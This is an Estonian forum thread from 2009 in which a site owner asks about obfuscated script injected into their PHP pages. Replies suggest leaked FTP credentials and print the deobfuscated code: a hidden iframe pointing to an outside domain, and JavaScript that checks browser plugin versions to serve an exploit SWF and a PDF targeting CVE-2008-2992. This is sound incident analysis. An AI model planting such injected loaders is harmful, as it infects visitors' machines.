Avaleht
uus teema   vasta Tarkvara »  Turvalisus »  Pahavaraline script kodulehel :/ märgi kõik teemad loetuks
märgi mitteloetuks
vaata eelmist teemat :: vaata järgmist teemat
Hinnavaatlus :: Foorum :: Uudised :: Ärifoorumid :: HV F1 ennustusvõistlus :: Pangalink :: Telekavad :: HV toote otsing
autor
sõnum Saada viide sõbrale.  :: Teata moderaatorile teata moderaatorile
otsing:  
Muhatu
HV vaatleja
Muhatu

liitunud: 27.02.2003
sõnum 05.05.2009 20:47:04 Pahavaraline script kodulehel :/ vasta tsitaadiga
Sain täna ootamatult teate, et mu saiti Safariga külastanud inimesed saavad sisenedes Google Safe Browsingu hoiatuse.

Seal olev link suunab siia: http://google.com/safebrowsing/diagnostic?tpl=safari&site=profitooltip.biz&hl=en-us

Kuid see profitooltip.biz pole kaugeltki minu sait. Hakkasin hämmeldunult asja uurima ning ehmatuseks leidsin oma lehe mitmest .php failist (põhilselt index) sellise scripti:

Spoiler Spoiler Spoiler


Saab keegi aru, mida selline pahaline teeb? Kuidas ta ennast on sisse söönud? Ilmselt on ftp kasutaja ja parool kuidagi lekkinud?
Kommentaarid: 7 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 7
tagasi üles
vaata kasutaja infot saada privaatsõnum
Absona
Lõuapoolik
Lõuapoolik

liitunud: 17.09.2008
sõnum 05.05.2009 21:21:56 vasta tsitaadiga
See on krüptitud. Eemalda see skript ja vaata kas mingeid vigu tekib. Kui ei, siis asi korras.

Selline asi saab kahel juhul juhtuda:
1) kui on teada ftp andmed (paroolid, salasõnad)
2) sul pole failide ja kaustade õigused paigas (failile poogitakse lihtsalt külge mingisugune kood, mis hakkab pahandust tegema).
_________________
Veebilehed, veebiprogrammeerimine, veebilahendused
Erinevad rakendused ja skriptid.
Kommentaarid: 11 loe/lisa Kasutajad arvavad:  :: 2 :: 0 :: 8
tagasi üles
vaata kasutaja infot saada privaatsõnum mine selle kasutaja kodulehele
priitr
HV kasutaja

liitunud: 17.06.2004
sõnum 06.05.2009 00:41:07 vasta tsitaadiga
Deobfuskeeritult icon_wink.gif on see kood siis selline:

<iframe width="480" height="60" src="http://profitooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>


feed.html sisaldab sihukest koodi:

function mjnhyua() { return 'ra'+'m'; }
for(i=0;navigator.plugins[i];i++){
                regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
var ertdfg = "dfgdfgdfgdf43565gkui";
                result=regexp.exec(navigator.plugins[i]['description']);
ertdfg = "dfgdfgdfgdf43565gkui";
                if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
ertdfg = "dfgdfgdfgdf43565gkui";
                        document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
ertdfg = "dfgdfgdfgdf43565gkui";
                        break;
                }
}
for(i=0;navigator.plugins[i];i++){
                name=navigator.plugins[i].name;
                if(name.indexOf('Adobe Acrobat')!=-1){
                        document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
                        break;
                }


Lähemalt vaadates on fnocs.pdf's pakitult javascript mis sisaldab CVE-2008-2992'd ära kasutavat koodi.

Seda binaarkoodi ei viitsi enam analüüsima hakata - eks see tõmbab vast siis lõpuks päris pahavara kohale ja paigaldab...
_________________
Tšudes ne bõvajet.
Kommentaarid: 27 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 27
tagasi üles
vaata kasutaja infot saada privaatsõnum
näita postitusi alates eelmisest:   
uus teema   vasta Tarkvara »  Turvalisus »  Pahavaraline script kodulehel :/
[vaata eelmist teemat] [vaata järgmist teemat]
 lisa lemmikuks
näita foorumit:  
 ignoreeri teemat 
sa ei või postitada uusi teemasid siia foorumisse
sa ei või vastata selle foorumi teemadele
sa ei või muuta oma postitusi selles foorumis
sa ei või kustutada oma postitusi selles foorumis
sa ei või vastata küsitlustele selles foorumis
sa ei saa lisada manuseid selles foorumis
sa võid manuseid alla laadida selles foorumis



Hinnavaatlus ei vastuta foorumis tehtud postituste eest.